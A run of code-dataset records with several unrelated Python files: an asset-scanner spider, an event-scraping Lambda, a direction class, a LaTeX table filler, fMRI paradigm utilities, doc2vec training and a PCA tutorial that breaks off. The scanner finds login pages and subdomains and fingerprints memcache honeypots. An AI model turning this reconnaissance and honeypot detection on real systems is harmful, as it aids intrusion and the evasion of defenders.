attr.path\n # login页面发现\n if len(path.split('login')) > 1 or len(path.split('sign')) > 1:\n print(attr)\n self.login_page.add(\"{}://{}{}\".format(attr.scheme, attr.netloc, path.strip()))\n # 资源发现\n array = re.findall('.*\\.[a-zA-Z]*', path)\n if array:\n self.resource_path.add(self.strip_suffix(array[0]))\n\n # 2、本地资源发现 ''\n elif text:\n array = re.findall(resource_local_pattern, text)\n array = map(self.strip_suffix, array)\n self.resource_path = self.resource_path | set(array)\n\n def strip_suffix(self, item):\n aa = re.sub('^=\"\\.?/?|\"$|^\\./|^/', '', item)\n return aa\n\n def test(self, url, domain=None, ip=None):\n resp = requests.get(url, headers=self.headers, verify=False, timeout=5)\n text = resp.text\n if domain:\n self.url_find(text, domain=domain) # url发现\n self.subdomain_find(domain, text) # 子域匹配\n self.resource_find(urls=self.urls) # 用url来匹配\n self.resource_find(text=text) # 用网页text来匹配\n elif ip:\n self.url_find(text, ip=ip)\n self.resource_find(urls=self.urls)\n self.resource_find(text=text)\n print('==' * 40)\n print(json.dumps(list(self.login_page)))\n print('==' * 40)\n print(json.dumps(list(self.urls)))\n print('==' * 40)\n print(json.dumps(list(self.resource_path)))\n print('==' * 40)\n print(json.dumps(list(self.subdomain)))\n\n\nclass MemcacheHoneypot:\n def __init__(self):\n self.result = {'name': '', 'desc': []}\n\n def get_stats(self, stats):\n for item in stats:\n if type(item) != dict:\n continue\n if item['version'] == '1.4.25':\n self.result['name'] = \"Memcache honeypot of dionaea\"\n 
self.result[\"desc\"].append(\"Non randomized features=1.4.25\")\n if item['libevent'] == '2.0.22-stable':\n self.result['name'] = \"Memcache honeypot of dionaea\"\n self.result[\"desc\"].append(\"Non randomized features=1.4.25\")\n # if item['rusage_system'] = \"0.233\":\n if item['rusage_system'] == \"0.110544\":\n self.result['name'] = \"Memcache honeypot of dionaea\"\n self.result[\"desc\"].append(\"Non randomized features=1.4.25\")\n\n def run(self):\n mc = memcache.Client(['127.0.0.1:11211'], debug=True)\n stats = mc.get_stats()\n\n # 黑洞, 只进不出\n if not stats:\n self.result[\"name\"] = \"low interaction honeypot of memcache\",\n self.result[\"desc\"] = [\"nothing data, it looks like a low interaction honeypot\"]\n\n # 校验参数特征\n self.get_stats()\n\n return self.result\n\n\nif __name__ == \"__main__\":\n ws = WebSpider()\n # ws.test(\"https://antiy.cn/\", \"antiy.cn\")\n # ws.test(\"https://cnblogs.com/\", \"cnblogs.com\")\n ws.test(\"http://172.31.50.252:8081/\", ip=\"172.31.50.252\")\n","sub_path":"micro/service/asset_scanner/modules/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":7191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"398447626","text":"# -*- coding:utf-8 -*-\n# @Time:2020/7/29 16:35\n# @Author:martin\n# @File:__init__.py.py\nimport xlrd\ntestdata = xlrd.open_workbook('testdata.xlsx') #打开表格,参数文件路径\ntable = testdata.sheet_by_name('Sheet1') #通过表中名称获取表\nnrows = table.nrows#获取总行数\nncols= table.ncols #获取总列数\nprint(table.row_values(0)) #获的第一行的值\nprint(table.col_values(0))# 获的第一列的值\n","sub_path":"testing/jiekou/commen/excel_.py","file_name":"excel_.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"640820454","text":"import ast\nimport boto3\nimport bs4\nimport csv\nfrom datetime import datetime\nimport re\nimport requests\nimport json\nimport unicodedata\n\nbucket = 'aimeeb-datasets-public'\nis_local = False\ncurrent_date = datetime.today()\nurl=\"https://caseytrees.org/events/\"+current_date.strftime(\"%Y-%m\")+\"/\"\n\n\ndef fetch_page(options):\n url = options['url']\n html_doc = requests.get(url).content\n return html_doc\n\ndef parse_event_cost(event_cost):\n if event_cost == \"Donation\":\n event_cost = event_cost.replace(\"Donation\",\"0\")\n return event_cost\n else:\n currency_re = re.compile(r'(?:[\\$]{1}[,\\d]+.?\\d*)')\n event_cost = re.findall(currency_re, event_cost)\n if len(event_cost) > 0:\n event_cost = event_cost[0].split(\".\")[0].replace(\"$\",'')\n event_cost = ''.join(s for s in event_cost if s.isdigit())\n return event_cost\n else:\n return ''\n\ndef handle_ans_page(soup):\n events_url = soup.find_all('td')\n websites = []\n categoryclasses = {}\n #extracts the url for the events\n for row in events_url:\n for column in row.find_all('div'):\n temp = column.text.strip()\n if(temp.isdigit()):\n pass\n else:\n websites.append(column.find('a')['href'])\n # not sure if this is a good way. 
to get the exact tags we might have to call the url and get the values\n # under event tag\n category_classes_dict = ast.literal_eval(column['data-tribejson'])\\\n ['categoryClasses'].split(\" \")\n event_category_classes=\"\"\n for each_categoryclasses in category_classes_dict:\n if(\"tribe-events-category-\" in each_categoryclasses):\n if(event_category_classes != \"\"):\n event_category_classes += \",\"\n event_category_classes += each_categoryclasses.replace(\"tribe-events-category-\",\"\")\n categoryclasses[column.find('a')['href']] = event_category_classes\n\n #extracts the complete details about events\n events_content = soup.find_all('script',{'type':'application/ld+json'})\n events_complete_data = set()\n for event in events_content:\n for website in websites:\n if(website in event.text.strip()):\n events_complete_data.add(event.text.strip())\n\n #converts the string to dict\n try:\n events_complete_data = ast.literal_eval(list(events_complete_data)[0])\n except:\n return []\n\n #extracts the required fields in the output schema\n result_all_event = []\n for con in events_complete_data:\n events_data = {}\n # some html string is present in event name default adding this to format it\n events_name_data = bs4.BeautifulSoup(con.get('name',''))\n events_data['Event Name'] = events_name_data.get_text()\n events_data['Event Website'] = con.get('url','')\n events_data['Event Category'] = categoryclasses.get(events_data['Event Website'],'')\n start = datetime.strptime(con['startDate'][:-6],\"%Y-%m-%dT%H:%M:%S\")\n end = datetime.strptime(con['endDate'][:-6],\"%Y-%m-%dT%H:%M:%S\")\n events_data['Event Start Date'] = start.strftime('%Y-%m-%d')\n events_data['Event End Date'] = end.strftime('%Y-%m-%d')\n events_data['Event Start Time'] = start.strftime('%H:%M:%S')\n events_data['Event End Time'] = end.strftime('%H:%M:%S')\n events_data['Timezone'] = \"America/New_York\"\n events_data['Event Venue Name'] = con['location']['name']\n events_data['Event Featured Image'] = con.get('image','')\n events_data['Event Description'] = unicodedata.normalize('NFKD', get_event_description(events_data['Event Website']))\n events_data['Event Cost'] = parse_event_cost(con['offers']['price'])\n events_data['Event Currency Symbol'] = \"$\"\n events_data['All Day Event'] = False\n organizer = con.get('organizer', False)\n if(organizer):\n events_data['Event Organizers'] = organizer.get('name',\"\")\n else:\n events_data['Event Organizers'] = \"\"\n # commenting addresss, latitude and longitude fields for now as The WordPress Event plugin doesn't\n # expect these fields, but we might eventually use their Map plugin, which would need those geo fields \n # events_data['address'] = ' '.join(str(x) for x in con['location']['address'].values())\n # commenting the latitude and longtide fields\n # events_data['latitude'] = \"no location\"\n # events_data['longitude'] = \"no location\"\n # location = con.get('location', False)\n # if(location):\n # geo = location.get('geo', False)\n # if(geo):\n # events_data['latitude'] = geo.get('latitude',\"no latitude\")\n # events_data['longitude'] = geo.get('longitude',\"no longitude\")\n # else:\n # events_data['latitude'] = \"no geo\"\n # events_data['longitude'] = \"no geo\"\n result_all_event.append(events_data)\n try:\n #checks if next month calender is present and passes the url to handle_ans_page function\n next = soup.find('li', {'class': 'tribe-events-nav-next'}).a['href']\n page = fetch_page({'url': next})\n soup = bs4.BeautifulSoup(page, 'html.parser')\n 
result_all_event.extend(handle_ans_page(soup))\n except:\n pass\n\n return result_all_event\n\n\n\ndef get_event_description(url):\n page = fetch_page({'url': url})\n soup = bs4.BeautifulSoup(page, 'html.parser')\n events_url = soup.find('meta', {'property': 'og:description'})['content']\n return events_url\n\n\ndef handler(event, context):\n url = event['url']\n source_name = event['source_name']\n page = fetch_page({'url': url})\n soup = bs4.BeautifulSoup(page, 'html.parser')\n event_output = handle_ans_page(soup)\n filename = '{0}-results.csv'.format(source_name)\n if not is_local:\n with open('/tmp/{0}'.format(filename), mode = 'w') as f:\n writer = csv.DictWriter(f, fieldnames = event_output[0].keys())\n writer.writeheader()\n [writer.writerow(event) for event in event_output]\n s3 = boto3.resource('s3')\n s3.meta.client.upload_file(\n '/tmp/{0}'.format(filename),\n bucket,\n 'capital-nature/{0}'.format(filename)\n )\n return json.dumps(event_output, indent=2)\n\n\n# For local testing\nevent = {\n 'url': url,\n 'source_name': 'casey_trees'\n}\n# is_local = False\n# print(handler(event, {}))\n\n","sub_path":"lambdas/casey_trees/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"652166553","text":"\"\"\"\nAn object dedicated to reporting where an Entity is going.\n\"\"\"\n\n\nclass Direction:\n\n IS_GOING_UP, IS_GOING_RIGHT = 1, 1\n IS_GOING_DOWN, IS_GOING_LEFT = -1, -1\n IS_STILL = 0\n\n STILL = 1\n UP = 2\n DOWN = 3\n LEFT = 5\n RIGHT = 7\n UP_LEFT = UP * LEFT\n UP_RIGHT = UP * RIGHT\n DOWN_LEFT = DOWN * LEFT\n DOWN_RIGHT = DOWN * RIGHT\n\n __DIRECTIONS = [STILL, UP, DOWN, LEFT, RIGHT, UP_LEFT, UP_RIGHT, DOWN_LEFT, DOWN_RIGHT]\n __AXIS = [UP, DOWN, LEFT, RIGHT]\n\n __DIRECTIONS_TO_STRING = {\n STILL: \"still\",\n UP: \"up\",\n DOWN: \"down\",\n LEFT: \"left\",\n RIGHT: \"right\",\n UP_LEFT: \"up-left\",\n UP_RIGHT: \"up-right\",\n DOWN_LEFT: \"down-left\",\n DOWN_RIGHT: \"down-right\"\n }\n\n def __init__(self):\n self.__instance = self.STILL\n\n def changeDirection(self, new_direction):\n \"\"\"\n Override the current direction.\n :param new_direction: The new direction\n \"\"\"\n if new_direction not in self.__DIRECTIONS:\n self.__instance = self.STILL\n else:\n self.__instance = new_direction\n\n def turn(self, direction):\n \"\"\"\n Turn to the given direction. Only UP, DOWN, LEFT and RIGHT are value parameters.\n :param direction: The new direction\n \"\"\"\n if direction not in self.__AXIS or \\\n direction == self.STILL or \\\n self.isGoing(direction):\n return\n\n if direction == Direction.DOWN and self.isGoing(Direction.UP):\n self.__instance *= Direction.DOWN / Direction.UP\n elif direction == Direction.UP and self.isGoing(Direction.DOWN):\n self.__instance *= Direction.UP / Direction.DOWN\n elif direction == Direction.LEFT and self.isGoing(Direction.RIGHT):\n self.__instance *= Direction.LEFT / Direction.RIGHT\n elif direction == Direction.RIGHT and self.isGoing(Direction.LEFT):\n self.__instance *= Direction.RIGHT / Direction.LEFT\n else:\n self.__instance *= direction\n\n if self.__instance not in self.__DIRECTIONS:\n print(f\"{self.__instance} somehow happened\")\n self.__instance /= direction\n\n def goBack(self, direction):\n \"\"\"\n Stop going towards the given direction. 
Only UP, DOWN, LEFT and RIGHT are value parameters.\n :param direction: The old direction\n \"\"\"\n if direction not in self.__AXIS or \\\n direction == self.STILL or \\\n not self.isGoing(direction):\n return\n\n self.__instance /= direction\n\n if self.__instance not in self.__DIRECTIONS:\n print(f\"{self.__instance} somehow happened\")\n self.__instance /= direction\n\n # Getters\n\n def __str__(self):\n return \"\".format(self.__DIRECTIONS_TO_STRING[self.__instance],\n self.__instance)\n\n def verticalDirection(self):\n \"\"\"\n Returns whether the direction is pointing upwards, downwards or none\n :return: the vertical direction\n \"\"\"\n if self.isGoing(Direction.UP):\n return self.IS_GOING_UP\n elif self.isGoing(Direction.DOWN):\n return self.IS_GOING_DOWN\n else:\n return self.IS_STILL\n\n def horizontalDirection(self):\n \"\"\"\n Returns whether the direction is pointing right, left or none\n :return: the horizontal direction\n \"\"\"\n if self.isGoing(Direction.RIGHT):\n return self.IS_GOING_RIGHT\n elif self.isGoing(Direction.LEFT):\n return self.IS_GOING_LEFT\n else:\n return self.IS_STILL\n\n def isStill(self):\n \"\"\"\n Returns whether the direction is going nowhere\n :return: a boolean\n \"\"\"\n return self.__instance == Direction.STILL\n\n def value(self):\n return self.__instance\n\n def isGoing(self, direction):\n return self.__instance % direction == 0\n\n\nif __name__ == '__main__':\n d = Direction()\n\n d.turn(Direction.DOWN)\n d.turn(Direction.RIGHT)\n print(d)\n d.turn(Direction.LEFT)\n print(d)\n d.turn(Direction.LEFT)\n print(d)\n d.turn(Direction.UP)\n print(d)\n","sub_path":"objects/direction.py","file_name":"direction.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"127855796","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# target_string: '\\cellcolor[rgb]{0.74,0.90,0.70}{}&\\cellcolor[rgb]{.7,.9,.9}4&\\cellcolor[rgb]{.8,.8,.9}5&\\cellcolor[rgb]{.8,.8,.9}5\\\\'\n\n\ncolor = ['FUCK', [188., 255., 255.], [222., 242., 217.], [255., 255., 255.], [254., 228., 211.], [253., 201., 168.]]\n\nt3_1_global_color = [1,5,2,3,1,1,1,1,1,1,1,1,1,1,1,4]\nt3_1_north_color = [2,2,5,1,3,1,1,1,4,1,5,1,1,1,1,2]\nt3_1_global_location = [\"非洲以南的海上\",\"斯里兰卡以西的海上\",\"印度洋中心\",\"印度洋中心\",\"中东地区里海北侧\",\"巴基斯坦北侧的乡下\",\"西藏自治区日喀则地区聂拉木县\",\"印度东侧曼尼普尔近锡尔杰尔\",\"印度洋北侧\",\"印度洋北侧\",\"新疆维吾尔自治区阿克苏地区沙雅县\",\"青海省海西蒙古族藏族自治州格尔木市\",\"非洲南侧\",\"非洲东南侧\",\"印度洋中心\",\"印度洋中心\"]\nt3_1_north_location = [\"孟买西侧阿拉伯海域\", \"马尔代夫西北方向阿拉伯海域\", \"斯里兰卡东南方向印度洋海域\", \"印度尼西亚棉兰\", \"舍甫琴柯堡西侧里海海域\", \"阿富汗中部地区\", \"西藏自治区日喀则地区吉隆县\", \"西藏自治区那曲地区那曲县\", \"马哈奇卡拉东侧里海海域\", \"塔吉克斯坦西南角\", \"新疆维吾尔自治区阿克苏地区沙雅县\", \"青海省海西蒙古族藏族自治州\", \"阿曼东侧阿拉伯海海域\", \"印度索姆纳特东侧\", \"印度金奈东侧阿拉伯海海域\", \"孟加拉湾安达曼群岛西侧\"]\n\nt3_2_global_color = [3, 2, 3, 1, 1, 1, 2, 1, 2, 2, 2, 1, 1, 1, 2, 1, 2, 2, 1, 1]\nt3_2_north_color = [1, 1, 1, 4, 1, 1, 1, 1, 1, 1, 1, 4, 1, 1, 4, 1, 3, 1, 1, 5]\nt3_2_global_location = [\"南极洲海岸边\", \"南极洲海岸边\", \"广西壮族自治区梧州市藤县321国道\", \"澳大利亚与大洋洲的中点\", \"印度洋南侧\", \"澳大利亚与大洋洲的中点\", \"俄罗斯外贝加尔边疆区\", \"澳大利亚西南侧\", \"澳大利亚西侧\", \"蒙古曼达勒敖包\", \"澳大利亚西南侧\", \"俄罗斯萨哈共和国\", \"澳大利亚西侧\", \"俄罗斯西伯利亚平原南侧\", \"俄罗斯与蒙古的国境线附近\", \"非洲南侧\", \"印度洋中心\", \"印度洋中心\", \"印度洋中心\", \"印度洋中心\"]\nt3_2_north_location = [\"蒙古巴彦德勒格尔\", \"湖南省益阳市桃江县\", \"湖南省永州市零陵区\", \"柬埔寨东北侧\", \"越南陆地最南端\", \"北冰洋中心\", \"俄罗斯西伯利亚平原中心\", \"蒙古共和国北侧\", \"蒙古共和国南侧\", \"内蒙古自治区阿拉善盟阿拉善左旗\", \"北冰洋中心\", \"俄罗斯西伯利亚平原北岸\", \"俄罗斯西伯利亚平原中部\", \"蒙古共和国与俄罗斯国境线北侧\", \"蒙古共和国与俄罗斯国境线北侧\", \"蒙古共和国乌兰巴托\", \"内蒙古自治区巴彦淖尔市乌拉特中旗呼四线\", \"内蒙古自治区鄂尔多斯市鄂托克前旗上海街\", \"云南省楚雄彝族自治州禄丰县\", \"云南省临沧市云县漫湾镇嘎止村\"]\n\nstarter = '\\cellcolor[rgb]{.9,.9,.9}$%d\\sim%d$ &'\ncell = '\\cellcolor[rgb]{%.2f,%.2f,%.2f}{%s}'\nender = '\\\\\\\\\\n'\n\nout = open('latex.txt', 'w')\n\ndef cell_filler(c, s):\n\treturn cell % (color[c][0]/255, color[c][1]/255, color[c][2]/255, s)\n\nfor Lg_min in xrange(5):\n\tout.write(starter % (Lg_min*1.5, (Lg_min+1)*1.5,))\n\tfor i in xrange(4):\n\t\tout.write(cell_filler(t3_2_north_color[i*4 + Lg_min], t3_2_north_location[i*4 + Lg_min]))\n\t\tif i != 3:\n\t\t\tout.write('&')\n\tout.write(ender)\n","sub_path":"latex_table_filler.py","file_name":"latex_table_filler.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"16345090","text":"\"\"\"\nSome utils too deal with peculiar protocols or peculiar ways of handling them\n\nAuthor: Bertrand Thirion, Ana Luisa Grilo Pinho, 2015\n\"\"\"\nimport numpy as np\nfrom pandas import read_csv, concat\n\n\nrsvp_language = ['consonant_strings', 'word_list', 'pseudoword_list',\n 'jabberwocky', 'simple_sentence', 'probe','complex_sentence']\narchi_social = [\n 'false_belief_video', 'non_speech', 'speech', 'mechanistic_audio',\n 'mechanistic_video', 'false_belief_audio', 'triangle_intention',\n 'triangle_random',]\n\nrelevant_conditions = {\n 'emotional': ['Face', 'Shape'],\n 'gambling': ['Reward', 'Punishment', 'Neutral'],\n 'hcp_language': ['math', 'story'],\n 'motor': ['LeftHand', 'RightHand', 'LeftFoot', 'RightFoot',\n 'Cue', 'Tongue'],\n 'relational': ['Relational', 'Cue', 'Control'],\n 'social': ['Mental', 'Response', 'Random'],\n 'wm': ['2-BackBody', '0-BackBody', '2-BackFace', '0-BackFace',\n '2-BackTools', '0-BackTools', '0-BackPlace', '2-BackPlace'],\n 'archi_social': archi_social,\n 'language_00': 
rsvp_language,\n 'language_01': rsvp_language,\n 'language_02': rsvp_language,\n 'language_03': rsvp_language,\n 'language_04': rsvp_language,\n 'language_05': rsvp_language\n }\n\n\ndef post_process(df, paradigm_id):\n language_paradigms = ['language_%02d' % i for i in range(6)] +\\\n ['rsvp-language', 'language_']\n if paradigm_id in language_paradigms:\n targets = ['complex_sentence_objrel',\n 'complex_sentence_objclef',\n 'complex_sentence_subjrel']\n for target in targets:\n df = df.replace(target, 'complex_sentence')\n targets = ['simple_sentence_cvp',\n 'simple_sentence_adj',\n 'simple_sentence_coord']\n for target in targets:\n df = df.replace(target, 'simple_sentence')\n\n # df.onset *= .001\n # df.duration = 3 * np.ones(len(df.duration))\n if paradigm_id == 'hcp_motor':\n df = df.replace('right_foot_cue', 'cue')\n df = df.replace('left_foot_cue', 'cue')\n df = df.replace('right_hand_cue', 'cue')\n df = df.replace('left_hand_cue', 'cue')\n df = df.replace('tongue_cue', 'cue')\n\n if paradigm_id in relevant_conditions.keys():\n relevant_items = relevant_conditions[paradigm_id]\n condition = np.array(\n [df.trial_type == r for r in relevant_items]).sum(0).astype(np.bool)\n df = df[condition]\n\n if paradigm_id[:10] == 'preference':\n domain = paradigm_id[11:]\n if domain[-1] == 's':\n domain = domain[:-1]\n #\n mean = df[df.trial_type == domain]['score'].mean()\n df['modulation'] = df['score'] - mean\n df = df.fillna(1)\n # add a regressor with constant values\n df2 = df[df.trial_type == domain]\n df2.modulation = np.ones_like(df2.modulation)\n df2.trial_type = '%s_constant' % domain\n # add quadratic regressor\n df3 = df[df.trial_type == domain]\n df3.modulation = df.modulation ** 2\n df3.modulation = df3.modulation - df3.modulation.mean()\n df3.trial_type = '%s_quadratic' % domain\n df = df.replace(domain, '%s_linear' % domain)\n df = concat([df, df2, df3], axis=0, ignore_index=True)\n\n responses_we = ['response_we_east_present_space_close',\n 'response_we_west_present_space_far',\n 'response_we_center_past_space_far',\n 'response_we_west_present_time_close',\n 'response_we_east_present_time_far',\n 'response_we_center_past_space_close',\n 'response_we_center_present_space_close',\n 'response_we_center_present_space_far',\n 'response_we_center_present_time_far',\n 'response_we_east_present_time_close',\n 'response_we_center_past_time_close',\n 'response_we_center_past_time_far',\n 'response_we_east_present_space_far',\n 'response_we_center_future_time_far',\n 'response_we_center_future_time_far',\n 'response_we_center_future_time_close',\n 'response_we_west_present_space_close',\n 'response_we_center_present_time_close',\n 'response_we_center_present_time_close',\n 'response_we_center_future_space_far',\n 'response_we_center_future_space_close',\n 'response_we_west_present_time_far']\n\n if paradigm_id == 'IslandWE':\n for response in responses_we:\n df = df.replace(response, 'response')\n\n responses_sn = ['response_sn_north_present_space_far',\n 'response_sn_south_present_time_close',\n 'response_sn_center_present_space_close',\n 'response_sn_south_present_time_far',\n 'response_sn_center_future_space_close',\n 'response_sn_center_past_space_close',\n 'response_sn_north_present_time_close',\n 'response_sn_center_past_space_far',\n 'response_sn_south_present_space_close',\n 'response_sn_center_present_time_far',\n 'response_sn_center_past_time_far',\n 'response_sn_center_future_space_far',\n 'response_sn_center_future_space_far',\n 'response_sn_center_future_time_close',\n 
'response_sn_center_past_time_close',\n 'response_sn_north_present_time_far',\n 'response_sn_south_present_space_far',\n 'response_sn_center_present_time_close',\n 'response_sn_north_present_space_close',\n 'response_sn_center_present_space_far',\n 'response_sn_center_future_time_far',\n 'response_sn_center_future_time_far',]\n\n if paradigm_id == 'IslandNS':\n for response in responses_sn:\n df = df.replace(response, 'response')\n\n if paradigm_id == 'enum':\n for i in range(1, 9):\n df = df.replace('memorization_num_%d' % i, 'response_num_%d' % i)\n if paradigm_id == 'VSTM':\n for i in range(1, 7):\n df = df.replace('memorization_num_%d' % i, 'response_num_%d' % i)\n\n instructions = ['Ins_bouche', 'Ins_index', 'Ins_jambe',\n 'Ins_main', 'Ins_repos', 'Ins_yeux', ]\n if paradigm_id == 'lyon_moto':\n for instruction in instructions:\n df = df.replace(instruction, 'instructions')\n df = df.replace('sacaade_right', 'saccade_right')\n df = df.replace('sacaade_left', 'saccade_left')\n # df = df.replace('Bfix', 'fixation')\n df = df[df.trial_type != 'Bfix']\n\n if paradigm_id == 'lyon_mcse':\n df = df[df.trial_type != 'Bfix']\n\n if paradigm_id == 'lyon_mvis':\n df = df[df.trial_type != 'grid']\n df = df[df.trial_type != 'Bfix']\n df = df[df.trial_type != 'maintenance']\n\n if paradigm_id == 'lyon_mveb':\n df = df[df.trial_type != 'cross']\n df = df[df.trial_type != 'blank2']\n\n if paradigm_id == 'audio':\n voices = ['voice_%d' % i for i in range(60)]\n musics = ['music_%d' % i for i in range(60)]\n animals = ['animal_%d' % i for i in range(60)]\n speeches = ['speech_%d' % i for i in range(60)]\n natures = ['nature_%d' % i for i in range(60)]\n tools = ['tools_%d' % i for i in range(60)]\n for voice in voices:\n df = df.replace(voice, 'voice')\n for animal in animals:\n df = df.replace(animal, 'animal')\n for music in musics:\n df = df.replace(music, 'music')\n for speech in speeches:\n df = df.replace(speech, 'speech')\n for nature in natures:\n df = df.replace(nature, 'nature')\n for tool in tools:\n df = df.replace(tool, 'tool')\n return df\n\n\ndef make_paradigm(onset_file, paradigm_id=None):\n \"\"\" Temporary fix \"\"\"\n if paradigm_id in ['wedge_clock', 'wedge_anti', 'cont_ring', 'exp_ring']:\n return None\n df = read_csv(onset_file, index_col=None, sep='\\t')\n if 'onset' not in df.keys() and 'Onsets' in df.keys():\n df['onset'] = df['Onsets']\n df.drop('Onsets', 1, inplace=True)\n if 'duration' not in df.keys() and 'Durations' in df.keys():\n df['duration'] = df['Durations']\n df.drop('Durations', 1, inplace=True)\n if 'trial_type' not in df.keys() and 'Conditions' in df.keys():\n df['trial_type'] = df['Conditions']\n df.drop('Conditions', 1, inplace=True)\n if 'onset' not in df.keys() and 'Onset' in df.keys():\n df['onset'] = df['Onset']\n df.drop('Onset', 1, inplace=True)\n if 'duration' not in df.keys() and 'Duration' in df.keys():\n df['duration'] = df['Duration']\n df.drop('Duration', 1, inplace=True)\n if 'trial_type' not in df.keys() and 'Condition' in df.keys():\n df['trial_type'] = df['Condition']\n df.drop('Condition', 1, inplace=True)\n if 'trial_type' not in df.keys() and 'name' in df.keys():\n df['trial_type'] = df['name']\n df.drop('name', 1, inplace=True)\n df = post_process(df, paradigm_id)\n df['name'] = df['trial_type']\n return df\n","sub_path":"ibc_public/utils_paradigm.py","file_name":"utils_paradigm.py","file_ext":"py","file_size_in_byte":9434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} 
+{"seq_id":"405984742","text":"import sys\naaa=str(sys.argv[1]).strip()\n\ndef read_data(filename):\n with open(filename, 'r') as f:\n data = [line.split('\\t') for line in f.read().splitlines()]\n data = data[1:] # header 제외\n return data\ntrain_data = read_data('./trainset/'+aaa+'.txt')\n\n\nprint(len(train_data)) # nrows: 150000\nprint(len(train_data[0]))\n\nfrom konlpy.tag import Twitter\npos_tagger = Twitter()\ndef tokenize(doc):\n # norm, stem은 optional\n return ['/'.join(t) for t in pos_tagger.pos(doc, norm=True, stem=True)]\ntrain_docs=list()\nfor row in train_data:\n\ttry:\n\t\ttrain_docs.append((tokenize(row[1]), row[2]))\n\texcept:\n\t\tcontinue\n#train_docs = [(tokenize(row[1]), row[2]) for row in train_data]\n\nfrom pprint import pprint\npprint(train_docs[0])\n\nfrom collections import namedtuple\nTaggedDocument = namedtuple('TaggedDocument', 'words tags')\ntagged_train_docs = [TaggedDocument(d, [c]) for d, c in train_docs]\n\nfrom gensim.models import doc2vec\n# 사전 구축\ndoc_vectorizer = doc2vec.Doc2Vec(size=300, alpha=0.025, min_alpha=0.025, seed=1234)\ndoc_vectorizer.build_vocab(tagged_train_docs)\n# Train document vectors!\nfor epoch in range(100):\n print (epoch)\n doc_vectorizer.train(tagged_train_docs)\n doc_vectorizer.alpha -= 0.002 # decrease the learning rate\n doc_vectorizer.min_alpha = doc_vectorizer.alpha # fix the learning rate, no decay\n# To save\ndoc_vectorizer.save('./model/'+aaa+'.model')\n\n\n\n\npprint(doc_vectorizer.most_similar('중간고사/Noun'))\n","sub_path":"Trend/learn/2_doc2vec_learn.py","file_name":"2_doc2vec_learn.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"53836985","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 16 16:55:19 2015\n\n@author: kartiks\nhttp://sebastianraschka.com/Articles/2014_pca_step_by_step.html\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.mplot3d import proj3d\nfrom matplotlib.patches import FancyArrowPatch\nfrom matplotlib.mlab import PCA as mlabPCA\nfrom sklearn.decomposition import PCA as sklearnPCA\n\n\nclass Arrow3D(FancyArrowPatch):\n def __init__(self, xs, ys, zs, *args, **kwargs):\n FancyArrowPatch.__init__(self, (0,0), (0,0), *args, **kwargs)\n self._verts3d = xs, ys, zs\n\n def draw(self, renderer):\n xs3d, ys3d, zs3d = self._verts3d\n xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)\n self.set_positions((xs[0],ys[0]),(xs[1],ys[1]))\n FancyArrowPatch.draw(self, renderer)\n\n\n\n\n\nnp.random.seed(4294967295) # random seed for consistency\n\n# A reader pointed out that Python 2.7 would raise a\n# \"ValueError: object of too small depth for desired array\".\n# This can be avoided by choosing a smaller random seed, e.g. 
1\n# or by completely omitting this line, since I just used the random seed for\n# consistency.\n\nmu_vec1 = np.array([0,0,0])\ncov_mat1 = np.array([[1,0,0],[0,1,0],[0,0,1]])\nclass1_sample = np.random.multivariate_normal(mu_vec1, cov_mat1, 20).T\nassert class1_sample.shape == (3,20), \"The matrix has not the dimensions 3x20\"\n\nmu_vec2 = np.array([1,1,1])\ncov_mat2 = np.array([[1,0,0],[0,1,0],[0,0,1]])\nclass2_sample = np.random.multivariate_normal(mu_vec2, cov_mat2, 20).T\nassert class1_sample.shape == (3,20), \"The matrix has not the dimensions 3x20\"\n\n#Plot the data\nfig = plt.figure(figsize=(8,8))\nax = fig.add_subplot(111, projection='3d')\nplt.rcParams['legend.fontsize'] = 10\nax.plot(class1_sample[0,:], class1_sample[1,:],\\\n class1_sample[2,:], 'o', markersize=8, color='blue', alpha=0.5, label='class1')\nax.plot(class2_sample[0,:], class2_sample[1,:],\\\n class2_sample[2,:], '^', markersize=8, alpha=0.5, color='red', label='class2')\n\nplt.title('Samples for class 1 and class 2')\nax.legend(loc='upper right')\nplt.show()\n\n\n# merge the samples into a single 3 X 40 dimensional array\nall_samples = np.concatenate((class1_sample, class2_sample), axis=1)\nassert all_samples.shape == (3,40), \"The matrix has not the dimensions 3x40\"\n\n\n# Caluclate the mean vector\nmean_x = np.mean(all_samples[0,:])\nmean_y = np.mean(all_samples[1,:])\nmean_z = np.mean(all_samples[2,:])\n\nmean_vector = np.array([[mean_x],[mean_y],[mean_z]])\n\nprint('Mean Vector:\\n', mean_vector)\n\n\n#compute the Scatter Matrix\nscatter_matrix = np.zeros((3,3))\nfor i in range(all_samples.shape[1]):\n scatter_matrix += (all_samples[:,i].reshape(3,1)\\\n - mean_vector).dot((all_samples[:,i].reshape(3,1) - mean_vector).T)\nprint('Scatter Matrix:\\n', scatter_matrix)\n\n#compute the Covariance Matrix\ncov_mat = np.cov([all_samples[0,:],all_samples[1,:],all_samples[2,:]])\nprint('Covariance Matrix:\\n', cov_mat)\n\n\n#Computing eigenvectors and corresponding eigenvalues\n# eigenvectors and eigenvalues for the from the scatter matrix\neig_val_sc, eig_vec_sc = np.linalg.eig(scatter_matrix)\n\n# eigenvectors and eigenvalues for the from the covariance matrix\neig_val_cov, eig_vec_cov = 